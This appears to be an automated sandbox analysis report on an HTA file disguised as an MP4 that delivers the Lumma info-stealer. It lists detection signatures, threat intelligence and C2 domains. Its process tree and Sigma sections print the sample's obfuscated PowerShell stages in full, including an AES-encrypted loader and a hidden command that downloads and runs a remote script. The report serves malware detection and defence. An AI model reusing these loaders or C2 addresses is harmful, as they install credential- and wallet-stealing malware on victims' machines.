Edit tour

Windows Analysis Report
web44.mp4.hta

Overview

General Information

Sample name:	web44.mp4.hta
Analysis ID:	1583047
MD5:	af46bc7df8441c09296666f0053fb000
SHA1:	f193e30afdc9a54afb68808cd37bc240ec29618d
SHA256:	d734e7c79310f56620a9243f1e3418e15fb507dec460b801eb0e14a7baa145c5
Tags:	EmmenhtalFakeCaptchaFakeMP4htauser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

LummaC encrypted strings found

Potentially malicious time measurement code found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious PowerShell Parameter Substring

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Yara detected Costura Assembly Loader

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to modify clipboard data

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for the Microsoft Outlook file path

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara signature match

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6616 cmdline: mshta.exe "C:\Users\user\Desktop\web44.mp4.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)

powershell.exe (PID: 7164 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A745966437058494F437867616E6175')),[byte[]]::new(16)).TransformFinalBlock($mBfyr,0,$mBfyr.Length)); & $AjiG.Substring(0,3) $AjiG.Substring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2108 cmdline: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1196 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisercluch.click", "screwamusresz.buzz", "hummskitnj.buzz", "scentniej.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "inherineau.buzz", "appliacnesot.buzz"], "Build id": "WG6I6S--web44"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.2455403030.0000000006E00000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: powershell.exe PID: 7164	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x8ccb:$b1: ::WriteAllBytes( 0x9598:$b1: ::WriteAllBytes( 0x11c5:$s1: -join 0x1de7:$s1: -join 0x8d80:$s1: -join 0x964d:$s1: -join 0x1f822:$s1: -join 0x2ba8d:$s1: -join 0x2c6bc:$s1: -join 0x2d528:$s1: -join 0x60e6e:$s1: -join 0x69e0e:$s1: -join 0x77617:$s1: -join 0x78237:$s1: -join 0x9ed9e:$s1: -join 0xabdb0:$s1: -join 0xb9b2c:$s1: -join 0xc6c01:$s1: -join 0xc9fd3:$s1: -join 0xca685:$s1: -join 0xcc176:$s1: -join
Process Memory Space: powershell.exe PID: 2108	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x314083:$b2: ::FromBase64String( 0x314007:$s1: -join 0x3abd3b:$s1: -join 0x68e6a7:$s1: -join 0x68f031:$s1: -join 0x6ff21a:$s1: -join 0x70c2ef:$s1: -join 0x70f6c1:$s1: -join 0x70fd73:$s1: -join 0x711864:$s1: -join 0x713a6a:$s1: -join 0x714291:$s1: -join 0x714b01:$s1: -join 0x71523c:$s1: -join 0x71526e:$s1: -join 0x7152b6:$s1: -join 0x7152d5:$s1: -join 0x715b25:$s1: -join 0x715ca1:$s1: -join 0x715d19:$s1: -join 0x715dac:$s1: -join
Process Memory Space: powershell.exe PID: 1196	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.powershell.exe.6e00000.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious MSHTA Child Process

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A74596

Sigma detected: Suspicious PowerShell Parameter Substring

Source: Process started

Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((koWp('5A74596

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine: "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = 